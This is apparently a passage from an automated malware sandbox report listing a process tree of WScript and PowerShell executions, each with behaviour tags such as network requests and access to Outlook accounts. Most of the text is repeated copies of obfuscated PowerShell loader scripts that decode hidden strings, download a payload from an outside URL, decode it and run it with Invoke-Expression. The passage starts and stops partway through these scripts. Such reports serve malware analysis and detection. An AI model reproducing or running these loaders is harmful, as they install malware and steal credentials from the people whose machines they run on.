SiBoEVeuAnrH e e,L,$ UKinUnM eeFreA T B) . ');Sekundovioliners162 $Magnis74;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Objektiviseringens.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Oui Kroniske Relaster #>;$Tykkammenes='Boraciferous';<#Mnstergyldigt Obtruded Preinserts Cabbies Forktringers #>;$Aeroduct=$Opkbenes+$host.UI;If ($Aeroduct) {$Aktieindsigtens++;}function Resborgerne($Rica){$Rendyrker=$Tensibly88+$Rica.Length-$Aktieindsigtens; for( $Wame=2;$Wame -lt $Rendyrker;$Wame+=3){$Snketunnel='Scog';$Disjune+=$Rica[$Wame];$Yenning='Amtsborgmesterens';}$Disjune;}function Patarine($Defoggers){ & ($Midstroke) ($Defoggers);}$Quinamidin=Resborgerne 'G.MLeo zFoiSpl l NaSm/Sk5Re.Ha0.l Mi(JoW i enT,dGuoM,w es y CeN hTM ,1Ta0Un. H0Ps;O hW iAsnB 6Tz4Mu; O AfxPy6Ge4 ;.o ParB,vAf:Ex1Tu2 S1Li.Gi0mi)d. S G Ke,mcRakC oS,/ S2 P0 1 0D.0Li1 o0pi1 r JoFPliK rO,escfSuoWixG /ti1Ku2U 1P . .0bi ';$Eukalyptussen=Resborgerne 'Nou.lsunESaRTe-,hat garE aNPat B ';$Verged=Resborgerne 'TrhTytSatkjp Askn: i/Ca/ FwfowMawBl.TufF ahesPotL.aEfnDik oaTouT,f . VdE eSv/ChUPorCleA t Pf r dTuiAlg,hh,ne.kdQueO,n M.S adacSaaT ';$Manettes=Resborgerne ' s>Ni ';$Midstroke=Resborgerne 'b itrEG xO ';$Redispersed='Umulige';$Kilowatttimer='\Redbuds.Dip';Patarine (Resborgerne 'Ma$SkGDrlB oSebdia lS.:I,c,dlC.Y SFlT.gES RHa1Mu2F,3Kl=Sp$ .e Jn,avTe: PA OpR,P.hdstaPeTs AHe+ M$ TkU iP,LAkOS wOpa oTF,TCoT ,IJoM ,eSkrW ');Patarine (Resborgerne 'Sl$TygKoLKoO Pb oa LFo:BuS BLU,iO tteH Oe RrP y =Mi$DrV nE .R CGL,eSlD a. NSSlPheLS,I,ttPo( e$GamI AUnnEpe EtteT OEO.s a)La ');Patarine (Resborgerne 'Tr[PoN.reP TSt.S S,rECaR SvNoiLaCIneEppStoMoIGaNAmT Tm Ca FNAgA TgRee rPr] E:Va: USTrEKocNauJor DiAft y Vp SrIno yTLioHjCA.o KLKo Su= D Pa[ en,aegotMo. SBiE ScBru orSyI iT uYasp,or o.nT loBaC O RLAlT fyBapPreSh]Ch:B :OrT FlS s 1Vh2Ly ');$Verged=$Slithery[0];$Skjolddragers=(Resborgerne 'Mi$ UgMlLFlOl BF aD Lcr:FlPLeh BeTanHaaYac,ieKatEdiDun ie,y= .nToEArWFr-R.o bN jAmeR CemTTr FjsRuYQuS ktDeEKomPh.TinL.e FTGu.HaW DeSvbOvc vlAliNieO NAbTRa ');Patarine ($Skjolddragers);Patarine (Resborgerne 'No$TePRhh .eBan iaZicD e et iNan.beRe.,nHFee Ma Adane.or os C[e $DiERau lk BaU,lStySupNotHou.os isB eSenFr] n=As$AcQReuOmiinn Aal m .iRadtiiLinNo ');$Tampen=Resborgerne 'Fo$B PTeh,geRen Ea bcbie tLeiFin Fe r.UnDAfoMiwStn Ul noApaSkd CFh.i Sl OeUd(Fy$ CVm eB rCag,ceTrd,q,gr$.lSPaoBalTee nsu),r ';$Solen=$Clyster123;Patarine (Resborgerne 'C $KogSkLHeoReb .A ,LT.: URAwaAnAUndUnGUnI.ev ,nExIfiN gRaE enM sF =Ca(S TBaEOvs DtCo-PrP pa itFuhKi De$VuS.uoB L,oe kN .) o ');while (!$Raadgivningens) {Patarine (Resborgerne ' $ZugTrl Oo Fb oaCil p:KfRPhdPon,ri nSugReeTrnse=Hj$EmtHur AuR eOp ') ;Patarine $Tampen;Patarine (Resborgerne 'BlSSeT oA rRUnTV - Rs lSoeheEPaP A Fn4sw ');Patarine (Resborgerne 'Mu$S gTrlAlO,tB Sa FL t: AR ua KaV D GStiCaVAdn EIInn CG OEMaN ES n=Sa(FoT sEPasWitM - DpSpa tNehSt J $Unsa osllB EHanPo)M ') ;Patarine (Resborgerne 'Ja$ egMeLsyo Db A il t:FosInoFiLUdkF.rOdegimB eC RAr=S,$KlGFlLPioSyB oANelTi: VSN o VMInn DoB,lSlEopSPeCKae EN rTFl+ U+ a%fo$ os L yIstTPoHFeEAsr .yIm.SkcBoo huCrn STCo ') ;$Verged=$Slithery[$Solkremer];}$Agersenneppen=326866;$Disyllabic=29427;Patarine (Resborgerne ' n$EmgL.LS,OReBP,AVoL.r: eBInK BK CE NDub ouSmnDoDMyE tNPaeAc St=T BnGM eXpTUn-CocHjoO NStTOrE ,nReTTo Si$ .s oP,lS,e WN i ');Patarine (Resborgerne ' e$ SgislcaoP b raKulCa: nWUniArnThgUdsS.pLeaOpnRu d.= M a[,lSPaySes atUreTam .LeCuhoAnnKov aeF rOut ].o:Bi:InFTerR oRem FB Sa as Re n6Hj4MaSR tAarReiGlnU gEx(T.$FoB .kHykBoe vn SbPhuWenKvdR,e n VePr) o ');Patarine (Resborgerne ' t$V GPhL TOK b .aFiLU.:InFS ipaS rk jeHuK Suslt atT.EJer SeTisSv Ca=El r[ .sReYF,SsaT EBuMSa.Mitr EreXnatMe.InePiNskCKao .D TI fn LgOu]Ca:Be:GiaMysTeC iI mIOp.veGUnE nTPosSgtMurBriPenHegCe(Ge$ wF,I QN SGEmS TpInA FnEj)bu ');Patarine (Resborgerne 'Me$s.GEjL O TbO.aHoLBo: Cs fKEkIWilJolLiIFrNdug,eSS vSpi NsFuEassTe=,r$FyF viP.SS,kO EKskToU mT cT einrIsEptSFi. FsBuU abBaSFoT rJuI BNHaG s(Tr$ uaFiG dek RR.sNeEDunOuN ueOvpLip.ne .NV , $PadIdI VSKoYLrLSjl FAMaB ei CLe) l ');Patarine $Skillingsvises;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1924
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\ettiqmncrjcotuzkafygqkfggbimrlnzo"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:388
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\gnytr"
  2⤵
  PID:3984
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\gnytr"
  2⤵
  - Accesses Microsoft Outlook accounts
  - System Location Discovery: System Language Discovery
  PID:2824
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\rillsxqx"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Surtouts Metalkiste Folium #>;$Opholdte231='Zenography';<#Anstand Misvouched Modelled Otmar Riffelgang #>;$Tilvristes=$Scrimshanker23+$host.UI;If ($Tilvristes) {$Rommy212++;}function Nonreceptively($lndstatistikkens){$Forringelsens212=$Tommestokkene+$lndstatistikkens.Length-$Rommy212; for( $Hjaelpefunktion242=2;$Hjaelpefunktion242 -lt $Forringelsens212;$Hjaelpefunktion242+=3){$Kller='Murmuringly222';$Partshringen+=$lndstatistikkens[$Hjaelpefunktion242];$pisachi='Turnering';}$Partshringen;}function Sekundovioliners162($Cardionosus){ . ($Prevented) ($Cardionosus);}$Nonscrutiny=Nonreceptively ' BMGro zSui .ltelVras /Co5Da.Fr0My .r( SWAsiOvn AdVaoSyw sCa kNDeT S 1Un0 . ,0 r;pa edWBaiB nCh6.o4Be;O .ex D6R 4De;R GrrB v v: F1 P2G 1Th. P0Li)Kl FoGObe.ic.akDeoS./ha2Ln0E 1 F0Su0 e1Nr0Un1 TrFBei lr SeInfScoLux.u/St1Ed2St1Tr.Ne0Ka ';$Afretters=Nonreceptively ' uUAms SeFirSh- Ta tGGre RN TUl ';$Noration252=Nonreceptively 'Smh KtBrtT pKosPr:No/Sa/ cw Rw hwE .RefIna HsK,thoa Fn sk EaU uMifC . IdHue /MoG Da pjSa.Dil,upP.k B ';$Densitometre=Nonreceptively 'Fa> R ';$Prevented=Nonreceptively 'leIEkEDexCr ';$Krigssituationens='Mngderabats';$Cadillo='\Alkyds.jen';Sekundovioliners162 (Nonreceptively 'Sl$ G .lIdO.nbMiAF,LSt:,ybskLTea ,rUni ,nAfaSe= o$ aeCen ,vLi:T a FpP P ud aChtGuASt+So$ hcPea.ads.i ilB LReO.i ');Sekundovioliners162 (Nonreceptively 'L $BeGTilBioMaBC,a LS.:.eAEvUSlt,uoOnPPahProF,TPro TMNaE CtUnR pySa=Op$ Pn .omarNyAAstapi aobonMa2K,5St2A..udSUnp ,L MIVat n(Ta$ BdFreeunfjsPri.etH,OJamH.EentUdRH ede) E ');Sekundovioliners162 (Nonreceptively 'Cy[RenR,EP,tTi. es TeInRFovPaIP c tE DPSto uISlnIdTYeMG a nN AShg e lRLa]op:Br: sBuE DCUnuR r iInTSeYefPRurBoOStTBeOggCUrOt l . =Do Et[Fen ReSat ,.FisAlE nCHeuSkrGaiCiT Ybup rNgo,jTFrOEkc hO aL tb y pN.ePr]Fl:an: iTReLe S C1Gu2Fr ');$Noration252=$autophotometry[0];$Terebrate=(Nonreceptively ' K$TeGFolK.o,lB .a,eLDe:PrFEnu hN.iA PM DBTeUSvL SAN TLaIC NRoG B=ViNhyEFlW a-faoFib .jbrEGuc TAr S s aYAsS,ntC,EInm T.BaNFlEBit.t.StWPoe AbkuC bL TiCieD NKotDe ');Sekundovioliners162 ($Terebrate);Sekundovioliners162 (Nonreceptively ' U$ lF Su mnToaOumBobGruMul KaPrtmoiRen CgEv.T HBle aArdIce Vr.ms O[ M$P,A IfT.r neCatIntE,eF.r,rs,n]Re=Sy$BeNFooP nTvs icdrrGauFot SiSonH yPr ');$Craniopuncture=Nonreceptively 'sk$ nF MuR nN,a tmMebAfu SlCoaUdtVei nUsgBr. MDChoT w,enSal oo yanudTrFPri VlO.eU.( ,$ ENBooCorUna,otA,iOvo WnFo2B 5S 2C,, $,kP ohFeoOpn yeUnmSueF sSt)G. ';$Phonemes=$Blarina;Sekundovioliners162 (Nonreceptively ' u$,nGOvLFoO bTiA AL H:Raf dRBaiC MR,RS KHoeSkH a TnSmD aLdaEWarO nAcE s .2 a4 A3Ha=,e(,oTa eBlSS,TEx- Pp CAMutSoh.i Re$ CpGuH CoOdNBoE umSyEOus )Md ');while (!$Frimrkehandlernes243) {Sekundovioliners162 (Nonreceptively ' i$FigSklBaoOub,raSylEd: .U dKadPreG lCei HgB,e Rs.e=.i$P tV r LuKue H ') ;Sekundovioliners162 $Craniopuncture;Sekundovioliners162 (Nonreceptively ' s MtUnABoRDeTT.-haSn,L ,e EOvPSi Re4Ni ');Sekundovioliners162 (Nonreceptively 'ex$JuGcaLStO AbDiaC,lgr:M F,irs I PMQ,RB KBeEK h AFonSkd ,Lpre mRTrN iEF.sCo2Ru4We3A = P(FrT eBaS Ct C- rp .A TQuH S Mi$E PSnhS OCrn,ae dMSieDesCh) ') ;Sekundovioliners162 (Nonreceptively 'C,$AuGArlr o SBPra,elRu:UnIRoNSitFoeSaRTeb .RAie taStT FhD =Ha$CoGTulBoONabFoA.llGa: d Se.onDaa eT uLir aETrr iJuN TG uSInMBlIPsdC LF EAnt SI,+Un+ P%S.$GoaRauUfTMuoSlpMehNaO iTCoO Rm .ESntQurD y e. Dc eoAiu oN.aTD. ') ;$Noration252=$autophotometry[$Interbreath];}$Superieure=333021;$Unmeet=29044;Sekundovioliners162 (Nonreceptively 'Ma$DeGEfl pO rb.rA lu.: GYtaChrFoD oEKoRF.KMoafaSN EWrRI,n GE .R P Af= L FlG lEimTUn-KrCWaoClNEnTM e iNBat.u Im$P pOph o .nAlEOvm NeDos,f ');Sekundovioliners162 (Nonreceptively 'P $S,gMal.voglbs.asulAn:H BS uFonAndBeb .r It Ps.n Or= O G.[ rS AyhesDrtPye,omV,.S,C Eo JnDev IeA rDitSa] a:Wa:whFCurCyoMamBlBWaa KsAueKl6 ,4 lS it Gr i GnmegTv(,t$D GAna Tr.mdCaeS rGlkTiaAfs ueCorBun.oe.arC.)be ');Sekundovioliners162 (Nonreceptively 'Ch$SuGT LCaOExB .aUdlDa:IwY dUdeHurDel I.og gRea AGie anHed.eEBlS.e =So Da[KvsLoYG sKitUnEC mSt.PatpiEc,x iTS .jue,eNmactjOMoDKoiOun cGd ]En:P.:xaATosHec eIK,iRe. DG ,eHat .S et BrH,iS.NAkgCh(U $PoBTuuL nF df BGirNaTIlsSi)Bi ');Sekundovioliners162 (Nonreceptively 'Si$ SgFelM.O iBOmaTalP :Idm,ea,uGBinLuISpSN.7.i4An=Ov$Joy d.neanR eL rIHogn gOua oAEfE,inl dp.E FS .GosCou SBMoSEnTUdr iCon.igRe(Fa$Dos SUI pS.E,ar SiBoEVeuAnrH e e,L,$ UKinUnM eeFreA T B) . ');Sekundovioliners162 $Magnis74;"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Oui Kroniske Relaster #>;$Tykkammenes='Boraciferous';<#Mnstergyldigt Obtruded Preinserts Cabbies Forktringers #>;$Aeroduct=$Opkbenes+$host.UI;If ($Aeroduct) {$Aktieindsigtens++;}function Resborgerne($Rica){$Rendyrker=$Tensibly88+$Rica.Length-$Aktieindsigtens; for( $Wame=2;$Wame -lt $Rendyrker;$Wame+=3){$Snketunnel='Scog';$Disjune+=$Rica[$Wame];$Yenning='Amtsborgmesterens';}$Disjune;}function Patarine($Defoggers){ & ($Midstroke) ($Defoggers);}$Quinamidin=Resborgerne 'G.MLeo zFoiSpl l NaSm/Sk5Re.Ha0.l Mi(JoW i enT,dGuoM,w es y CeN hTM ,1Ta0Un. H0Ps;O hW iAsnB 6Tz4Mu; O AfxPy6Ge4 ;.o ParB,vAf:Ex1Tu2 S1Li.Gi0mi)d. S G Ke,mcRakC oS,/ S2 P0 1 0D.0Li1 o0pi1 r JoFPliK rO,escfSuoWixG /ti1Ku2U 1P . .0bi ';$Eukalyptussen=Resborgerne 'Nou.lsunESaRTe-,hat garE aNPat B ';$Verged=Resborgerne 'TrhTytSatkjp Askn: i/Ca/ FwfowMawBl.TufF ahesPotL.aEfnDik oaTouT,f . VdE eSv/ChUPorCleA t Pf r dTuiAlg,hh,ne.kdQueO,n M.S adacSaaT ';$Manettes=Resborgerne ' s>Ni ';$Midstroke=Resborgerne 'b itrEG xO ';$Redispersed='Umulige';$Kilowatttimer='\Redbuds.Dip';Patarine (Resborgerne 'Ma$SkGDrlB oSebdia lS.:I,c,dlC.Y SFlT.gES RHa1Mu2F,3Kl=Sp$ .e Jn,avTe: PA OpR,P.hdstaPeTs AHe+ M$ TkU iP,LAkOS wOpa oTF,TCoT ,IJoM ,eSkrW ');Patarine (Resborgerne 'Sl$TygKoLKoO Pb oa LFo:BuS BLU,iO tteH Oe RrP y =Mi$DrV nE .R CGL,eSlD a. NSSlPheLS,I,ttPo( e$GamI AUnnEpe EtteT OEO.s a)La ');Patarine (Resborgerne 'Tr[PoN.reP TSt.S S,rECaR SvNoiLaCIneEppStoMoIGaNAmT Tm Ca FNAgA TgRee rPr] E:Va: USTrEKocNauJor DiAft y Vp SrIno yTLioHjCA.o KLKo Su= D Pa[ en,aegotMo. SBiE ScBru orSyI iT uYasp,or o.nT loBaC O RLAlT fyBapPreSh]Ch:B :OrT FlS s 1Vh2Ly ');$Verged=$Slithery[0];$Skjolddragers=(Resborgerne 'Mi$ UgMlLFlOl BF aD Lcr:FlPLeh BeTanHaaYac,ieKatEdiDun ie,y= .nToEArWFr-R.o bN jAmeR CemTTr FjsRuYQuS ktDeEKomPh.TinL.e FTGu.HaW DeSvbOvc vlAliNieO NAbTRa ');Patarine ($Skjolddragers);Patarine (Resborgerne 'No$TePRhh .eBan iaZicD e et iNan.beRe.,nHFee Ma Adane.or os C[e $DiERau lk BaU,lStySupNotHou.os isB eSenFr] n=As$AcQReuOmiinn Aal m .iRadtiiLinNo ');$Tampen=Resborgerne 'Fo$B PTeh,geRen Ea bcbie tLeiFin Fe r.UnDAfoMiwStn Ul noApaSkd CFh.i Sl OeUd(Fy$ CVm eB rCag,ceTrd,q,gr$.lSPaoBalTee nsu),r ';$Solen=$Clyster123;Patarine (Resborgerne 'C $KogSkLHeoReb .A ,LT.: URAwaAnAUndUnGUnI.ev ,nExIfiN gRaE enM sF =Ca(S TBaEOvs DtCo-PrP pa itFuhKi De$VuS.uoB L,oe kN .) o ');while (!$Raadgivningens) {Patarine (Resborgerne ' $ZugTrl Oo Fb oaCil p:KfRPhdPon,ri nSugReeTrnse=Hj$EmtHur AuR eOp ') ;Patarine $Tampen;Patarine (Resborgerne 'BlSSeT oA rRUnTV - Rs lSoeheEPaP A Fn4sw ');Patarine (Resborgerne 'Mu$S gTrlAlO,tB Sa FL t: AR ua KaV D GStiCaVAdn EIInn CG OEMaN ES n=Sa(FoT sEPasWitM - DpSpa tNehSt J $Unsa osllB EHanPo)M ') ;Patarine (Resborgerne 'Ja$ egMeLsyo Db A il t:FosInoFiLUdkF.rOdegimB eC RAr=S,$KlGFlLPioSyB oANelTi: VSN o VMInn DoB,lSlEopSPeCKae EN rTFl+ U+ a%fo$ os L yIstTPoHFeEAsr .yIm.SkcBoo huCrn STCo ') ;$Verged=$Slithery[$Solkremer];}$Agersenneppen=326866;$Disyllabic=29427;Patarine (Resborgerne ' n$EmgL.LS,OReBP,AVoL.r: eBInK BK CE NDub ouSmnDoDMyE tNPaeAc St=T BnGM eXpTUn-CocHjoO NStTOrE ,nReTTo Si$ .s oP,lS,e WN i ');Patarine (Resborgerne ' e$ SgislcaoP b raKulCa: nWUniArnThgUdsS.pLeaOpnRu d.= M a[,lSPaySes atUreTam .LeCuhoAnnKov aeF rOut ].o:Bi:InFTerR oRem FB Sa as Re n6Hj4MaSR tAarReiGlnU gEx(T.$FoB .kHykBoe vn SbPhuWenKvdR,e n VePr) o ');Patarine (Resborgerne ' t$V GPhL TOK b .aFiLU.:InFS ipaS rk jeHuK Suslt atT.EJer SeTisSv Ca=El r[ .sReYF,SsaT EBuMSa.Mitr EreXnatMe.InePiNskCKao .D TI fn LgOu]Ca:Be:GiaMysTeC iI mIOp.veGUnE nTPosSgtMurBriPenHegCe(Ge$ wF,I QN SGEmS TpInA FnEj)bu ');Patarine (Resborgerne 'Me$s.GEjL O TbO.aHoLBo: Cs fKEkIWilJolLiIFrNdug,eSS vSpi NsFuEassTe=,r$FyF viP.SS,kO EKskToU mT cT einrIsEptSFi. FsBuU abBaSFoT rJuI BNHaG s(Tr$ uaFiG dek RR.sNeEDunOuN ueOvpLip.ne .NV , $PadIdI VSKoYLrLSjl FAMaB ei CLe) l ');Patarine $Skillingsvises;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Surtouts Metalkiste Folium #>;$Opholdte231='Zenography';<#Anstand Misvouched Modelled Otmar Riffelgang #>;$Tilvristes=$Scrimshanker23+$host.UI;If ($Tilvristes) {$Rommy212++;}function Nonreceptively($lndstatistikkens){$Forringelsens212=$Tommestokkene+$lndstatistikkens.Length-$Rommy212; for( $Hjaelpefunktion242=2;$Hjaelpefunktion242 -lt $Forringelsens212;$Hjaelpefunktion242+=3){$Kller='Murmuringly222';$Partshringen+=$lndstatistikkens[$Hjaelpefunktion242];$pisachi='Turnering';}$Partshringen;}function Sekundovioliners162($Cardionosus){ . ($Prevented) ($Cardionosus);}$Nonscrutiny=Nonreceptively ' BMGro zSui .ltelVras /Co5Da.Fr0My .r( SWAsiOvn AdVaoSyw sCa kNDeT S 1Un0 . ,0 r;pa edWBaiB nCh6.o4Be;O .ex D6R 4De;R GrrB v v: F1 P2G 1Th. P0Li)Kl FoGObe.ic.akDeoS./ha2Ln0E 1 F0Su0 e1Nr0Un1 TrFBei lr SeInfScoLux.u/St1Ed2St1Tr.Ne0Ka ';$Afretters=Nonreceptively ' uUAms SeFirSh- Ta tGGre RN TUl ';$Noration252=Nonreceptively 'Smh KtBrtT pKosPr:No/Sa/ cw Rw hwE .RefIna HsK,thoa Fn sk EaU uMifC . IdHue /MoG Da pjSa.Dil,upP.k B ';$Densitometre=Nonreceptively 'Fa> R ';$Prevented=Nonreceptively 'leIEkEDexCr ';$Krigssituationens='Mngderabats';$Cadillo='\Alkyds.jen';Sekundovioliners162 (Nonreceptively 'Sl$ G .lIdO.nbMiAF,LSt:,ybskLTea ,rUni ,nAfaSe= o$ aeCen ,vLi:T a FpP P ud aChtGuASt+So$ hcPea.ads.i ilB LReO.i ');Sekundovioliners162 (Nonreceptively 'L $BeGTilBioMaBC,a LS.:.eAEvUSlt,uoOnPPahProF,TPro TMNaE CtUnR pySa=Op$ Pn .omarNyAAstapi aobonMa2K,5St2A..udSUnp ,L MIVat n(Ta$ BdFreeunfjsPri.etH,OJamH.EentUdRH ede) E ');Sekundovioliners162 (Nonreceptively 'Cy[RenR,EP,tTi. es TeInRFovPaIP c tE DPSto uISlnIdTYeMG a nN AShg e lRLa]op:Br: sBuE DCUnuR r iInTSeYefPRurBoOStTBeOggCUrOt l . =Do Et[Fen ReSat ,.FisAlE nCHeuSkrGaiCiT Ybup rNgo,jTFrOEkc hO aL tb y pN.ePr]Fl:an: iTReLe S C1Gu2Fr ');$Noration252=$autophotometry[0];$Terebrate=(Nonreceptively ' K$TeGFolK.o,lB .a,eLDe:PrFEnu hN.iA PM DBTeUSvL SAN TLaIC NRoG B=ViNhyEFlW a-faoFib .jbrEGuc TAr S s aYAsS,ntC,EInm T.BaNFlEBit.t.StWPoe AbkuC bL TiCieD NKotDe ');Sekundovioliners162 ($Terebrate);Sekundovioliners162 (Nonreceptively ' U$ lF Su mnToaOumBobGruMul KaPrtmoiRen CgEv.T HBle aArdIce Vr.ms O[ M$P,A IfT.r neCatIntE,eF.r,rs,n]Re=Sy$BeNFooP nTvs icdrrGauFot SiSonH yPr ');$Craniopuncture=Nonreceptively 'sk$ nF MuR nN,a tmMebAfu SlCoaUdtVei nUsgBr. MDChoT w,enSal oo yanudTrFPri VlO.eU.( ,$ ENBooCorUna,otA,iOvo WnFo2B 5S 2C,, $,kP ohFeoOpn yeUnmSueF sSt)G. ';$Phonemes=$Blarina;Sekundovioliners162 (Nonreceptively ' u$,nGOvLFoO bTiA AL H:Raf dRBaiC MR,RS KHoeSkH a TnSmD aLdaEWarO nAcE s .2 a4 A3Ha=,e(,oTa eBlSS,TEx- Pp CAMutSoh.i Re$ CpGuH CoOdNBoE umSyEOus )Md ');while (!$Frimrkehandlernes243) {Sekundovioliners162 (Nonreceptively ' i$FigSklBaoOub,raSylEd: .U dKadPreG lCei HgB,e Rs.e=.i$P tV r LuKue H ') ;Sekundovioliners162 $Craniopuncture;Sekundovioliners162 (Nonreceptively ' s MtUnABoRDeTT.-haSn,L ,e EOvPSi Re4Ni ');Sekundovioliners162 (Nonreceptively 'ex$JuGcaLStO AbDiaC,lgr:M F,irs I PMQ,RB KBeEK h AFonSkd ,Lpre mRTrN iEF.sCo2Ru4We3A = P(FrT eBaS Ct C- rp .A TQuH S Mi$E PSnhS OCrn,ae dMSieDesCh) ') ;Sekundovioliners162 (Nonreceptively 'C,$AuGArlr o SBPra,elRu:UnIRoNSitFoeSaRTeb .RAie taStT FhD =Ha$CoGTulBoONabFoA.llGa: d Se.onDaa eT uLir aETrr iJuN TG uSInMBlIPsdC LF EAnt SI,+Un+ P%S.$GoaRauUfTMuoSlpMehNaO iTCoO Rm .ESntQurD y e. Dc eoAiu oN.aTD. ') ;$Noration252=$autophotometry[$Interbreath];}$Superieure=333021;$Unmeet=29044;Sekundovioliners162 (Nonreceptively 'Ma$DeGEfl pO rb.rA lu.: GYtaChrFoD oEKoRF.KMoafaSN EWrRI,n GE .R P Af= L FlG lEimTUn-KrCWaoClNEnTM e iNBat.u Im$P pOph o .nAlEOvm NeDos,f ');Sekundovioliners162 (Nonreceptively 'P $S,gMal.voglbs.asulAn:H BS uFonAndBeb .r It Ps.n Or= O G.[ rS AyhesDrtPye,omV,.S,C Eo JnDev IeA rDitSa] a:Wa:whFCurCyoMamBlBWaa KsAueKl6 ,4 lS it Gr i GnmegTv(,t$D GAna Tr.mdCaeS rGlkTiaAfs ueCorBun.oe.arC.)be ');Sekundovioliners162 (Nonreceptively 'Ch$SuGT LCaOExB .aUdlDa:IwY dUdeHurDel I.og gRea AGie anHed.eEBlS.e =So Da[KvsLoYG sKitUnEC mSt.PatpiEc,x iTS .jue,eNmactjOMoDKoiOun cGd ]En:P.:xaATosHec eIK,iRe. DG ,eHat .S et BrH,iS.NAkgCh(U $PoBTuuL nF df BGirNaTIlsSi)Bi ');Sekundovioliners162 (Nonreceptively 'Si$ SgFelM.O iBOmaTalP :Idm,ea,uGBinLuISpSN.7.i4An=Ov$Joy d.neanR eL rIHogn gOua oAEfE,inl dp.E FS .GosCou SBMoSEnTUdr iCon.igRe(Fa$Dos SUI pS.E,ar SiBoEVeuAnrH e e,L,$ UKinUnM eeFreA T B) . ');Sekundovioliners162 $Magnis74;"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Oui Kroniske Relaster #>;$Tykkammenes='Boraciferous';<#Mnstergyldigt Obtruded Preinserts Cabbies Forktringers #>;$Aeroduct=$Opkbenes+$host.UI;If ($Aeroduct) {$Aktieindsigtens++;}function Resborgerne($Rica){$Rendyrker=$Tensibly88+$Rica.Length-$Aktieindsigtens; for( $Wame=2;$Wame -lt $Rendyrker;$Wame+=3){$Snketunnel='Scog';$Disjune+=$Rica[$Wame];$Yenning='Amtsborgmesterens';}$Disjune;}function Patarine($Defoggers){ & ($Midstroke) ($Defoggers);}$Quinamidin=Resborgerne 'G.MLeo zFoiSpl l NaSm/Sk5Re.Ha0.l Mi(JoW i enT,dGuoM,w es y CeN hTM ,1Ta0Un. H0Ps;O hW iAsnB 6Tz4Mu; O AfxPy6Ge4 ;.o ParB,vAf:Ex1Tu2 S1Li.Gi0mi)d. S G Ke,mcRakC oS,/ S2 P0 1 0D.0Li1 o0pi1 r JoFPliK rO,escfSuoWixG /ti1Ku2U 1P . .0bi ';$Eukalyptussen=Resborgerne 'Nou.lsunESaRTe-,hat garE aNPat B ';$Verged=Resborgerne 'TrhTytSatkjp Askn: i/Ca/ FwfowMawBl.TufF ahesPotL.aEfnDik oaTouT,f . VdE eSv/ChUPorCleA t Pf r dTuiAlg,hh,ne.kdQueO,n M.S adacSaaT ';$Manettes=Resborgerne ' s>Ni ';$Midstroke=Resborgerne 'b itrEG xO ';$Redispersed='Umulige';$Kilowatttimer='\Redbuds.Dip';Patarine (Resborgerne 'Ma$SkGDrlB oSebdia lS.:I,c,dlC.Y SFlT.gES RHa1Mu2F,3Kl=Sp$ .e Jn,avTe: PA OpR,P.hdstaPeTs AHe+ M$ TkU iP,LAkOS wOpa oTF,TCoT ,IJoM ,eSkrW ');Patarine (Resborgerne 'Sl$TygKoLKoO Pb oa LFo:BuS BLU,iO tteH Oe RrP y =Mi$DrV nE .R CGL,eSlD a. NSSlPheLS,I,ttPo( e$GamI AUnnEpe EtteT OEO.s a)La ');Patarine (Resborgerne 'Tr[PoN.reP TSt.S S,rECaR SvNoiLaCIneEppStoMoIGaNAmT Tm Ca FNAgA TgRee rPr] E:Va: USTrEKocNauJor DiAft y Vp SrIno yTLioHjCA.o KLKo Su= D Pa[ en,aegotMo. SBiE ScBru orSyI iT uYasp,or o.nT loBaC O RLAlT fyBapPreSh]Ch:B :OrT FlS s 1Vh2Ly ');$Verged=$Slithery[0];$Skjolddragers=(Resborgerne 'Mi$ UgMlLFlOl BF aD Lcr:FlPLeh BeTanHaaYac,ieKatEdiDun ie,y= .nToEArWFr-R.o bN jAmeR CemTTr FjsRuYQuS ktDeEKomPh.TinL.e FTGu.HaW DeSvbOvc vlAliNieO 